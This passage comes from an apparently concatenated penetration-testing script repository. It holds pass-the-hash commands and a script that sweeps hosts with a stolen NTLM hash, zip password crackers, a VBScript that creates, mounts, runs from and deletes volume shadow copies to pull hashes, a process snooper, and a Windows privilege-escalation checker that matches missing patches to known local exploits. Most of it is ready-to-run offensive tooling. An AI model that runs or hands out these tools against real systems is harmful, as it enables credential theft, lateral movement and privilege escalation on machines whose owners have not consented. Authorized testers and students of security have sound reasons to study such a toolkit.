of Email : " , mailcount) 13 | print ("\n\nStart Reading Messages\n\n") 14 | for i in range(mailcount): 15 | for message in pop3server.retr(i+1)[1]: 16 | print (message) 17 | pop3server.quit() 18 | -------------------------------------------------------------------------------- /PSExec/psexec_toolist.txt: -------------------------------------------------------------------------------- 1 | root@kali:# /usr/share/doc/python-impacket/examples/wmiexec.py -hashes x:x alice@x.x.x.x 2 | root@kali:~/Desktop# pth-winexe -U 3 | Fubar%aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca //192.168.187.135 cmd 4 | 5 | 6 | 7 | REF: 8 | https://www.trustedsec.com/2015/06/no_psexec_needed/MSF 9 | 10 | PSexec – http://www.rapid7.com/db/modules/exploit/windows/smb/psexec 11 | Sysinternal PSexec – https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx 12 | SMbexec – https://github.com/pentestgeek/smbexec 13 | Winexe – http://sourceforge.net/projects/winexe/ 14 | PtH tool kit – https://code.google.com/p/passing-the-hash/downloads/list 15 | Impacket – https://github.com/coresecurity/impacket 16 | WMIS: The Missing Piece of the Ownage Puzzle – http://passing-the-hash.blogspot.com/2013/07/WMIS-PowerSploit-Shells.html 17 | -------------------------------------------------------------------------------- /PTH/autocheck_pth.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Daniel Torres 3 | # daniel.torres@owasp.org 4 | # ISB.COM.BO 5 | THREADS="30" 6 | OKBLUE='\033[94m' 7 | OKRED='\033[91m' 8 | OKGREEN='\033[92m' 9 | RESET='\e[0m' 10 | 11 | #iptables -I INPUT -p icmp --icmp-type 8 -j DROP 12 | 13 | while getopts ":u:h:p:f:o:" OPTIONS 14 | do 15 | case $OPTIONS in 16 | u) USUARIO=$OPTARG;; 17 | h) HASH=$OPTARG;; 18 | p) PASSWORD=$OPTARG;; 19 | f) FILE=$OPTARG;; 20 | o) OUTPUT=$OPTARG;; 21 | ?) 
printf "Opcion invalida: -$OPTARG\n" $0 22 | exit 2;; 23 | esac 24 | done 25 | 26 | USUARIO=${USUARIO:=NULL} 27 | HASH=${HASH:=NULL} 28 | PASSWORD=${PASSWORD:=NULL} 29 | FILE=${FILE:=NULL} 30 | 31 | 32 | 33 | function print_ascii_art { 34 | cat << "EOF" 35 | ╦ ┌─┐┌─┐┌─┐┬ ┌─┐┌┬┐┌┬┐┬┌┐┌ ┌─┐┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐ 36 | ║ │ ││ ├─┤│ ├─┤ │││││││││ │ ├─┤├┤ │ ├┴┐├┤ ├┬┘ 37 | ╩═╝└─┘└─┘┴ ┴┴─┘ ┴ ┴─┴┘┴ ┴┴┘└┘ └─┘┴ ┴└─┘└─┘┴ ┴└─┘┴└─ 38 | daniel.torres@owasp.org 39 | https://github.com/DanielTorres1 40 | EOF 41 | } 42 | print_ascii_art 43 | if [ $USUARIO = NULL ] ; then 44 | echo "| " 45 | echo "| USO: local-admin-checker.sh -u [usuario] -h [hash] -p [password] -o [salida] -f [file]" 46 | echo "| " 47 | echo "" 48 | exit 49 | fi 50 | echo -e "$OKBLUE Probando con usuario: $USUARIO y hash $HASH $RESET" 51 | ###################### 52 | if [ $FILE = NULL ] ; then 53 | if [ -f reports/OS-report.txt ] 54 | then 55 | 56 | for ip in $(grep -i Windows reports/OS-report.txt | cut -d ";" -f1 ); do 57 | echo -e "[+] $OKBLUE Testeando $ip .. $RESET" 58 | if [ $HASH = NULL ] ; then 59 | #echo "PASSWORD $PASSWORD" 60 | pth-winexe -U $USUARIO%$PASSWORD //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 61 | else 62 | pth-winexe -U $USUARIO%aad3b435b51404eeaad3b435b51404ee:$HASH //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 63 | #echo "HASH $HASH" 64 | fi 65 | echo "" 66 | sleep 3 67 | done 68 | else 69 | echo -e "$OKRED [!] Error. Esta ejecuando en el directorio creado por lanScanner.sh ? $RESET" 70 | fi 71 | else 72 | for ip in $(cat $FILE); do 73 | echo -e "[+] $OKBLUE Testeando $ip .. 
$RESET" 74 | if [ $HASH = NULL ] ; then 75 | #echo "PASSWORD $PASSWORD" 76 | pth-winexe -U $USUARIO%$PASSWORD //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 77 | else 78 | pth-winexe -U $USUARIO%aad3b435b51404eeaad3b435b51404ee:$HASH //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 79 | #echo "HASH $HASH" 80 | fi 81 | echo "" 82 | sleep 3 83 | done 84 | fi 85 | -------------------------------------------------------------------------------- /PTH/pth-winexe.txt: -------------------------------------------------------------------------------- 1 | export SMBHASH= 2 | pth-winexe -U Administrator% //10.11.1.220 cmd 3 | -------------------------------------------------------------------------------- /PasswordCrack/zipcrack.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | from time import time 3 | import sys 4 | 5 | 6 | 7 | 8 | def usage(): 9 | print sys.argv[0], " secretfile passwordfile" 10 | 11 | 12 | def main(): 13 | secret_file = sys.argv[1] 14 | password_file = sys.argv[1] 15 | try: 16 | myZip = zipfile.ZipFile(secret_file) 17 | except zipfile.BadZipfile: 18 | print "[!] There was an error opening your zip file." 19 | return 20 | 21 | password = '' 22 | 23 | timeStart = time() 24 | with open(password_file, "r") as f: 25 | passes = f.readlines() 26 | for pass_count, x in enumerate(passes): 27 | password = x.strip() 28 | try: 29 | myZip.extractall(pwd = password) 30 | totalTime = time() - timeStart 31 | print "\nPassword cracked: %s\n" % password 32 | print "%i password attempts per second." % (pass_count/totalTime) 33 | return 34 | except Exception as e: 35 | if str(e[0]) == 'Bad password for file': 36 | pass # TODO: properly handle exceptions? 37 | elif 'Error -3 while decompressing' in str(e[0]): 38 | pass # TODO: properly handle exceptions? 39 | else: 40 | print e 41 | print "Sorry, password not found." 
42 | 43 | if __name__ == '__main__': 44 | if len(sys.argv) < 3: 45 | usage() 46 | else: 47 | main() 48 | # https://www.doyler.net/security-not-included/python-zip-password-cracker 49 | -------------------------------------------------------------------------------- /PasswordCrack/zipcrack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "ZIP-JTR Decrypt Script"; 3 | if [ $# -ne 2 ] 4 | then 5 | echo "Usage $0 "; 6 | exit; 7 | fi 8 | unzip -l $1 9 | for i in $(john --wordlist=$2 --rules --stdout) 10 | do 11 | echo -ne "\rtrying \"$i\" " 12 | unzip -o -P $i $1 >/dev/null 2>&1 13 | STATUS=$? 14 | if [ $STATUS -eq 0 ]; then 15 | echo -e "\nArchive password is: \"$i\"" 16 | break 17 | fi 18 | done 19 | -------------------------------------------------------------------------------- /PortFwd/README.md: -------------------------------------------------------------------------------- 1 | #### Python Port Foward 2 | 3 | - https://github.com/klsecservices/rpivot 4 | - https://github.com/vinodpandey/python-port-forward 5 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Linux/ps_history.sh: -------------------------------------------------------------------------------- 1 | # https://github.com/xiaoxiaoleo/pentest-script/edit/master/PrivilegeEscalation/Linux/ps_history.sh 2 | 3 | while true 4 | do 5 | echo "$(date '+TIME:%H:%M:%S') $(ps -e -o ruser,command >> pshistory)" | tee -a logfile 6 | awk '!seen[$0]++' pshistory > pshistory.temp 7 | mv pshistory.temp pshistory 8 | sleep 0.1 9 | done 10 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/Hash/vssown.vbs: -------------------------------------------------------------------------------- 1 | REM Volume Shadow Copy Management from CLI. 2 | REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes. 
3 | REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53). 4 | 5 | Set args = WScript.Arguments 6 | 7 | if args.Count < 1 Then 8 | wscript.Echo "Usage: cscript vssown.vbs [option]" 9 | wscript.Echo 10 | wscript.Echo " Options:" 11 | wscript.Echo 12 | wscript.Echo " /list - List current volume shadow copies." 13 | wscript.Echo " /start - Start the shadow copy service." 14 | wscript.Echo " /stop - Halt the shadow copy service." 15 | wscript.Echo " /status - Show status of shadow copy service." 16 | wscript.Echo " /mode - Display the shadow copy service start mode." 17 | wscript.Echo " /mode [Manual|Automatic|Disabled] - Change the shadow copy service start mode." 18 | wscript.Echo " /create [drive_letter] - Create a shadow copy." 19 | wscript.Echo " /delete [id|*] - Delete a specified or all shadow copies." 20 | wscript.Echo " /mount [path] [device_object] - Mount a shadow copy to the given path." 21 | wscript.Echo " /execute [\path\to\file] - Launch executable from within an umounted shadow copy." 22 | wscript.Echo " /store - Display storage statistics." 23 | wscript.Echo " /size [bytes] - Set drive space reserved for shadow copies." 24 | REM build_off 25 | wscript.Echo " /build [filename] - Print pasteable script to stdout."REM no_build 26 | REM build_on 27 | wscript.Quit(0) 28 | End If 29 | 30 | strComputer = "." 
31 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 32 | 33 | Select Case args.Item(0) 34 | 35 | Case "/list" 36 | Wscript.Echo "SHADOW COPIES" 37 | Wscript.Echo "=============" 38 | Wscript.Echo 39 | Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy") 40 | For Each objItem in colItems 41 | Wscript.Echo "[*] ID: " & objItem.ID 42 | Wscript.Echo "[*] Client accessible: " & objItem.ClientAccessible 43 | Wscript.Echo "[*] Count: " & objItem.Count 44 | Wscript.Echo "[*] Device object: " & objItem.DeviceObject 45 | Wscript.Echo "[*] Differential: " & objItem.Differential 46 | Wscript.Echo "[*] Exposed locally: " & objItem.ExposedLocally 47 | Wscript.Echo "[*] Exposed name: " & objItem.ExposedName 48 | Wscript.Echo "[*] Exposed remotely: " & objItem.ExposedRemotely 49 | Wscript.Echo "[*] Hardware assisted: " & objItem.HardwareAssisted 50 | Wscript.Echo "[*] Imported: " & objItem.Imported 51 | Wscript.Echo "[*] No auto release: " & objItem.NoAutoRelease 52 | Wscript.Echo "[*] Not surfaced: " & objItem.NotSurfaced 53 | Wscript.Echo "[*] No writers: " & objItem.NoWriters 54 | Wscript.Echo "[*] Originating machine: " & objItem.OriginatingMachine 55 | Wscript.Echo "[*] Persistent: " & objItem.Persistent 56 | Wscript.Echo "[*] Plex: " & objItem.Plex 57 | Wscript.Echo "[*] Provider ID: " & objItem.ProviderID 58 | Wscript.Echo "[*] Service machine: " & objItem.ServiceMachine 59 | Wscript.Echo "[*] Set ID: " & objItem.SetID 60 | Wscript.Echo "[*] State: " & objItem.State 61 | Wscript.Echo "[*] Transportable: " & objItem.Transportable 62 | Wscript.Echo "[*] Volume name: " & objItem.VolumeName 63 | Wscript.Echo 64 | Next 65 | wscript.Quit(0) 66 | 67 | Case "/start" 68 | Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") 69 | For Each objService in colListOfServices 70 | objService.StartService() 71 | Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service." 
Next
wscript.Quit(0)

REM /stop: ask the Service Control Manager (through WMI) to stop the VSS service.
REM Only the stop request is issued; the script exits 0 regardless of StopService's result.
Case "/stop"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
objService.StopService()
Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
Next
wscript.Quit(0)

REM /status: print the current State of the VSS service (e.g. Running / Stopped).
Case "/status"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
Wscript.Echo "[*] " & objService.State
Next
wscript.Quit(0)

REM /mode: with no second argument, show the VSS start mode; otherwise set it to
REM Manual, Automatic or Disabled (the argument is lower-cased before comparison).
REM NOTE(review): errResult is assigned only when ChangeStartMode actually runs, so in
REM the display-only and invalid-mode branches the script exits with an Empty value.
Case "/mode"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
if args.Count < 2 Then
Wscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode."
Else
mode = LCase(args.Item(1))
if mode = "manual" or mode = "automatic" or mode = "disabled" Then
errResult = objService.ChangeStartMode(mode)
Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode."
Else
Wscript.Echo "[*] '" & mode & "' is not a valid start mode."
End If
END If
Next
wscript.Quit(errResult)

REM /create: create a ClientAccessible shadow copy of the drive letter given in args(1).
REM The new copy's ID comes back in strShadowID but is never printed - run /list to find
REM it. The WMI return value of Create becomes the process exit code.
REM A shadow copy exposes locked files (registry hives, NTDS.dit) for offline copying,
REM which is presumably why this script lives under Hash/ - see the file header.
Case "/create"
VOLUME = args.Item(1) & ":\"
Const CONTEXT = "ClientAccessible"
Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
Wscript.Echo "[*] Attempting to create a shadow copy."
errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
wscript.Quit(errResult)

REM /delete: remove the shadow copy whose ID equals args(1), or every shadow copy when
REM args(1) is "*". An ID that matches nothing deletes nothing and exits with an Empty
REM errResult. Deleting all copies also destroys the host's restore points, so on an
REM engagement only do this with the client's explicit agreement.
Case "/delete"
id = args.Item(1)
Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
For Each objItem in colItems
if objItem.ID = id Then
Wscript.Echo "[*] Attempting to delete shadow copy with ID: " & id
errResult = objItem.Delete_
ElseIf id = "*" Then
Wscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "."
errResult = objItem.Delete_
End If
Next
wscript.Quit(errResult)

REM /mount: expose a shadow copy's device object at the path in args(1) through a
REM directory symbolic link, by running "cmd /C mklink /D <link> <device_object>\".
REM NOTE(review): the command line is built by plain concatenation with no quoting, so a
REM link path containing spaces or cmd metacharacters is split/interpreted by cmd.exe -
REM pass only trusted arguments. The return value of WshShell.Run is discarded, so the
REM "has been mounted" message is printed even when mklink failed (mklink /D normally
REM needs an elevated prompt). Window style 2 = minimised; the third argument waits for
REM cmd to finish.
Case "/mount"
Set WshShell = WScript.CreateObject("WScript.Shell")
link = args.Item(1)
sc = args.Item(2) & "\"
cmd = "cmd /C mklink /D " & link & " " & sc
WshShell.Run cmd, 2, true
Wscript.Echo "[*] " & sc & " has been mounted to " & link & "."
wscript.Quit(0)

REM /execute: try to launch args(1) (a path starting with "\", per the usage text) from
REM inside each shadow copy in turn, stopping at the first successful
REM Win32_Process.Create. Replacing "?" with "." in the device object path is
REM presumably what turns the \\?\GLOBALROOT\... name into one process creation will
REM resolve - verify on the target OS version.
Case "/execute"
file = args.Item(1)
Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
Set objProcess = objWMIService.Get("Win32_Process")
For Each objItem in colItems
path = Replace(objItem.DeviceObject,"?",".") & file
intReturn = objProcess.Create(path)
if intReturn <> 0 Then
wscript.Echo "[*] Process could not be created from " & path & "."
wscript.Echo "[*] ReturnValue = " & intReturn
Else
wscript.Echo "[!] Process created from " & path & "."
150 | wscript.Quit(0) 151 | End If 152 | Next 153 | wscript.Quit(0) 154 | 155 | Case "/store" 156 | Wscript.Echo "SHADOW STORAGE" 157 | Wscript.Echo "==============" 158 | Wscript.Echo 159 | Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage") 160 | For Each objItem in colItems 161 | Wscript.Echo "[*] Allocated space: " & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB" 162 | Wscript.Echo "[*] Maximum size: " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB" 163 | Wscript.Echo "[*] Used space: " & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB" 164 | Wscript.Echo 165 | Next 166 | wscript.Quit(0) 167 | 168 | Case "/size" 169 | storagesize = CDbl(args.Item(1)) 170 | Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage") 171 | For Each objItem in colItems 172 | objItem.MaxSpace = storagesize 173 | objItem.Put_ 174 | Next 175 | Wscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB." 176 | wscript.Quit(0) 177 | 178 | REM build_off 179 | Case "/build" 180 | build = 1 181 | Const ForReading = 1 182 | Set objFSO = CreateObject("Scripting.FileSystemObject") 183 | Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading) 184 | Do Until objTextFile.AtEndOfStream 185 | strNextLine = objTextFile.Readline 186 | if InStr(strNextLine,"REM build_off") = 3 Then 187 | build = 0 188 | End If 189 | if strNextLine <> "" and build = 1 Then 190 | strNextLine = Replace(strNextLine,"&","^&") 191 | strNextLine = Replace(strNextLine,">","^>") 192 | strNextLine = Replace(strNextLine,"<","^<") 193 | wscript.Echo "echo " & strNextLine & " >> " & args.Item(1) 194 | End If 195 | if InStr(strNextLine,"REM build_on") = 3 Then 196 | build = 1 197 | End If 198 | Loop 199 | wscript.Quit(0) 200 | REM build_on 201 | 202 | End Select 203 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/README.md: 
-------------------------------------------------------------------------------- 1 | ##### Task schedule 2 | 3 | https://www.nirsoft.net/utils/task_scheduler_view.html 4 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/WinPrivCheck.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem #---------------------------------------------------------------------------------# 4 | rem # Name = Windows Privilege Escalation Check v1.0 # 5 | rem # Reference = http://www.fuzzysecurity.com/tutorials/16.html # 6 | rem # Author = @ihack4falafel # 7 | rem # Date = 9/18/2017 # 8 | rem # Tested On = Windows XP SP3 - Professional # 9 | rem # Windows 7 SP1 - Entrprise # 10 | rem # Windows 10 - Professional # 11 | rem # Usage = WinPrivCheck.bat # 12 | rem # Requirements = accesschk.exe(old version) - sysinternals # 13 | rem #---------------------------------------------------------------------------------# 14 | 15 | 16 | @echo off 17 | rem Used rem instead of echo for cleaner output. 
18 | @echo on 19 | 20 | rem #----------# 21 | rem # Hostname # 22 | rem #----------# 23 | 24 | @echo off 25 | 26 | hostname 27 | 28 | @echo on 29 | 30 | rem #----------# 31 | rem # Username # 32 | rem #----------# 33 | 34 | @echo off 35 | 36 | echo %username% 2>NUL 37 | whoami 2>NUL 38 | echo %userprofile% 2>NUL 39 | 40 | @echo on 41 | 42 | rem #-----------# 43 | rem # OS Verion # 44 | rem #-----------# 45 | 46 | @echo off 47 | 48 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 49 | 50 | @echo on 51 | 52 | rem #--------------------# 53 | rem # Installed Software # 54 | rem #--------------------# 55 | 56 | @echo off 57 | 58 | wmic product get Name, Version 59 | 60 | @echo on 61 | 62 | rem #-----------------# 63 | rem # Available Users # 64 | rem #-----------------# 65 | 66 | @echo off 67 | 68 | net users 69 | 70 | @echo on 71 | 72 | rem #----------------# 73 | rem # Network Config # 74 | rem #----------------# 75 | 76 | @echo off 77 | 78 | ipconfig /all 79 | 80 | @echo on 81 | 82 | rem #--------------# 83 | rem # Route Config # 84 | rem #--------------# 85 | 86 | @echo off 87 | 88 | route print 89 | 90 | @echo on 91 | 92 | rem #-----------# 93 | rem # ARP Cache # 94 | rem #-----------# 95 | 96 | @echo off 97 | 98 | arp -a 99 | 100 | @echo on 101 | 102 | rem #---------------------# 103 | rem # Network Connections # 104 | rem #---------------------# 105 | 106 | @echo off 107 | 108 | netstat -ano 109 | 110 | @echo on 111 | 112 | rem #-------------------# 113 | rem # Firewall Settings # 114 | rem #-------------------# 115 | 116 | @echo off 117 | 118 | netsh firewall show state 119 | netsh firewall show config 120 | 121 | @echo on 122 | 123 | rem #------------------# 124 | rem # Running Services # 125 | rem #------------------# 126 | 127 | @echo off 128 | 129 | net start 130 | 131 | @echo on 132 | 133 | rem #------------------------# 134 | rem # Local PrivEsc Exploits # 135 | rem #------------------------# 136 | 137 | @echo off 138 | 139 | rem 
Given this script is for all versions of Windows, I'd cross-reference the results with the matrix below to avoid false positives. Also note that wmic qfe only lists hotfixes the Windows Update agent recorded on this host: a later cumulative or superseding update may not carry the original KB number, so a "NOT installed" line below is a lead to confirm (OS build number, the patched binary's file version, or a controlled test of the exploit), not proof that the host is vulnerable. 140 | 141 | 142 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 143 | rem # Exploits Index | 2K | XP | 2K3 | 2K8 | Vista | 7 | Title | 144 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 145 | rem # KB2592799 | MS11-080 | X | SP3 | SP3 | X | X | X | afd.sys - Local privilege Escalation | 146 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 147 | rem # KB3143141 | MS16-032 | X | X | X | SP1/2 | SP2 | SP1 | Secondary Logon - Local privilege Escalation | 148 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 149 | rem # KB2393802 | MS11-011 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | WmiTraceMessageVa - Local privilege Escalation | 150 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 151 | rem # KB982799 | MS10-059 | X | X | X | ALL | ALL | SP0 | Chimichurri - Local privilege Escalation | 152 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 153 | rem # KB979683 | MS10-021 | SP4 | SP2/3 | SP2 | SP2 | SP0/1/2 | SP0 | Windows Kernel - Local privilege Escalation | 154 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 155 | rem # KB2305420 | MS10-092 | X | X | X | SP0/1/2 | SP1/2 | SP0 | Task Scheduler - Local privilege Escalation | 156 | rem
#-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 157 | rem # KB981957 | MS10-073 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | Keyboard Layout - Local privilege Escalation | 158 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 159 | rem # KB4013081 | MS17-017 | X | X | X | SP2 | SP2 | SP1 | Registry Hive Loading - Local privilege Escalation | 160 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 161 | rem # KB977165 | MS10-015 | ALL | ALL | ALL | ALL | ALL | ALL | User Mode to Ring - Local privilege Escalation | 162 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 163 | rem # KB941693 | MS08-025 | SP4 | SP2 | SP1/2 | SP0 | SP0/1 | X | win32k.sys - Local privilege Escalation | 164 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 165 | rem # KB920958 | MS06-049 | SP4 | X | X | X | X | X | ZwQuerySysInfo - Local privilege Escalation | 166 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 167 | rem # KB914389 | MS06-030 | ALL | SP2 | X | X | X | X | Mrxsmb.sys - Local privilege Escalation | 168 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 169 | rem # KB908523 | MS05-055 | SP4 | X | X | X | X | X | APC Data-Free - Local privilege Escalation | 170 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 171 | rem # KB890859 | MS05-018 | SP3/4 | SP1/2 | X | X | X | X | CSRSS - Local 
privilege Escalation | 172 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 173 | rem # KB842526 | MS04-019 | SP2/3/4 | X | X | X | X | X | Utility Manager - Local privilege Escalation | 174 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 175 | rem # KB835732 | MS04-011 | SP2/3/4 | SP0/1 | X | X | X | X | LSASS service BoF - Remote Code Execution | 176 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 177 | rem # KB841872 | MS04-020 | SP4 | X | X | X | X | X | POSIX - Local Privilege Escalation | 178 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 179 | rem # KB2975684 | MS14-040 | X | X | SP2 | SP2 | SP2 | SP1 | afd.sys Dangling Pointer - Local Privilege Escalation | 180 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 181 | rem # KB3136041 | MS16-016 | X | X | X | SP1/2 | SP2 | SP1 | WebDAV to Address - Local Privilege Escalation | 182 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 183 | rem # KB3057191 | MS15-051 | X | X | SP2 | SP2 | SP2 | SP1 | win32k.sys - Local Privilege Escalation | 184 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 185 | rem # KB2989935 | MS14-070 | X | X | SP2 | X | X | X | TCP/IP - Local Privilege Escalation | 186 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 187 | 188 | 189 | wmic qfe get 
Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" | find /i "KB2592799" 1>NUL 190 | IF not errorlevel 1 ( 191 | 192 | echo MS11-080 patch is installed :( 193 | 194 | ) ELSE ( 195 | 196 | echo MS11-080 patch is NOT installed! 197 | 198 | ) 199 | 200 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" | find /i "KB3143141" 1>NUL 201 | IF not errorlevel 1 ( 202 | 203 | echo MS16-032 patch is installed :( 204 | 205 | ) ELSE ( 206 | 207 | echo MS16-032 patch is NOT installed! 208 | 209 | ) 210 | 211 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" | find /i "KB2393802" 1>NUL 212 | IF not errorlevel 1 ( 213 | 214 | echo MS11-011 patch is installed :( 215 | 216 | ) ELSE ( 217 | 218 | echo MS11-011 patch is NOT installed! 219 | 220 | ) 221 | 222 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" | find /i "KB982799" 1>NUL 223 | IF not errorlevel 1 ( 224 | 225 | echo MS10-059 patch is installed :( 226 | 227 | ) ELSE ( 228 | 229 | echo MS10-059 patch is NOT installed! 230 | 231 | ) 232 | 233 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" | find /i "KB979683" 1>NUL 234 | IF not errorlevel 1 ( 235 | 236 | echo MS10-021 patch is installed :( 237 | 238 | ) ELSE ( 239 | 240 | echo MS10-021 patch is NOT installed! 241 | 242 | ) 243 | 244 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" | find /i "KB2305420" 1>NUL 245 | IF not errorlevel 1 ( 246 | 247 | echo MS10-092 patch is installed :( 248 | 249 | ) ELSE ( 250 | 251 | echo MS10-092 patch is NOT installed! 252 | 253 | ) 254 | 255 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" | find /i "KB981957" 1>NUL 256 | IF not errorlevel 1 ( 257 | 258 | echo MS10-073 patch is installed :( 259 | 260 | ) ELSE ( 261 | 262 | echo MS10-073 patch is NOT installed! 
263 | 264 | ) 265 | 266 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" | find /i "KB4013081" 1>NUL 267 | IF not errorlevel 1 ( 268 | 269 | echo MS17-017 patch is installed :( 270 | 271 | ) ELSE ( 272 | 273 | echo MS17-017 patch is NOT installed! 274 | 275 | ) 276 | 277 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" | find /i "KB977165" 1>NUL 278 | IF not errorlevel 1 ( 279 | 280 | echo MS10-015 patch is installed :( 281 | 282 | ) ELSE ( 283 | 284 | echo MS10-015 patch is NOT installed! 285 | 286 | ) 287 | 288 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" | find /i "KB941693" 1>NUL 289 | IF not errorlevel 1 ( 290 | 291 | echo MS08-025 patch is installed :( 292 | 293 | ) ELSE ( 294 | 295 | echo MS08-025 patch is NOT installed! 296 | 297 | ) 298 | 299 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" | find /i "KB920958" 1>NUL 300 | IF not errorlevel 1 ( 301 | 302 | echo MS06-049 patch is installed :( 303 | 304 | ) ELSE ( 305 | 306 | echo MS06-049 patch is NOT installed! 307 | 308 | ) 309 | 310 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" | find /i "KB914389" 1>NUL 311 | IF not errorlevel 1 ( 312 | 313 | echo MS06-030 patch is installed :( 314 | 315 | ) ELSE ( 316 | 317 | echo MS06-030 patch is NOT installed! 318 | 319 | ) 320 | 321 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" | find /i "KB908523" 1>NUL 322 | IF not errorlevel 1 ( 323 | 324 | echo MS05-055 patch is installed :( 325 | 326 | ) ELSE ( 327 | 328 | echo MS05-055 patch is NOT installed! 329 | 330 | ) 331 | 332 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" | find /i "KB890859" 1>NUL 333 | IF not errorlevel 1 ( 334 | 335 | echo MS05-018 patch is installed :( 336 | 337 | ) ELSE ( 338 | 339 | echo MS05-018 patch is NOT installed! 
